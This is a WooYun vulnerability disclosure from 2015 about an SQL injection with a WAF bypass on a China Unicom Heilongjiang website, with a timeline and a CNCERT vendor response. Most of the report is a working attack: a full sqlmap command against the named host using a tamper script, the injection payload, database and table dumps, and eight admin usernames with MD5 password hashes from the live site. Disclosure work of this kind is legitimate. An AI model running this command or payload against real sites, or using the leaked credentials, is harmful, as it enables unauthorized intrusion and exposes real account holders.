当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129854

漏洞标题:运营商安全之黑龙江联通绕过SQL注入绕过WAF

相关厂商:中国联通

漏洞作者: 路人甲

提交时间:2015-07-30 12:11

修复时间:2015-09-17 10:46

公开时间:2015-09-17 10:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-30: 细节已通知厂商并且等待厂商处理中
2015-08-03: 厂商已经确认,细节仅向厂商公开
2015-08-13: 细节向核心白帽子及相关领域专家公开
2015-08-23: 细节向普通白帽子公开
2015-09-02: 细节向实习白帽子公开
2015-09-17: 细节向公众公开

简要描述:

详细说明:

sqlmap.py -u "http://www.chinaunicomsi.cn/cnc/cncsi.asp?id=%5c" --tamper=space2mssqlblank.py --current-db


有WAF,加个tamper=space2mssqlblank.py脚本即可绕过

1.jpg


2.jpg


3.jpg


sqlmap identified the following injection points with a total of 65 HTTP(s) requests:
---
Parameter: id (GET)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
current database: 'oyy'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: oyy
[16 tables]
+-----------------+
| Admin |
| BigClass_down |
| Download |
| Feedback |
| News |
| SmallClass |
| SmallClass_down |
| WebBasicInfo |
| bigClass |
| book_setup |
| dtproperties |
| gonggao |
| shop_pinglun |
| sogo_link |
| sysconstraints |
| syssegments |
+-----------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: oyy
Table: admin
[12 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| Addtime | datetime |
| admin | nvarchar |
| aleave | nvarchar |
| ArticleNum | int |
| bigclassauthorize | nvarchar |
| ID | int |
| LastLogintime | datetime |
| LoginIP | nvarchar |
| LoginNum | int |
| password | nvarchar |
| smallclassauthorize | nvarchar |
| userkey | int |
+---------------------+----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6037=6037) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: oyy
Table: admin
[8 entries]
+---------+----------------------------------+
| admin | password |
+---------+----------------------------------+
| admin | 0cc175b9c0f1b6a831c399e269772661 |
| liubin | 790a26695c7c9f38fa32d95bfa6b8e4a |
| liujia | b9181c2c34c3a4200643799ded066a29 |
| oyaya | 0cc175b9c0f1b6a831c399e269772661 |
| test | 0cc175b9c0f1b6a831c399e269772661 |
| twhd | 0e263a2a84460a460cc77ee5be06d0ac |
| wangll | 927941f81c139547f7b5ff053498638c |
| zhangll | 3077bb4f20cf94e87aa0796eeb078fe3 |
+---------+----------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-08-03 10:45

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给黑龙江分中心,由其后续协调网站管理单位处置。

最新状态:

暂无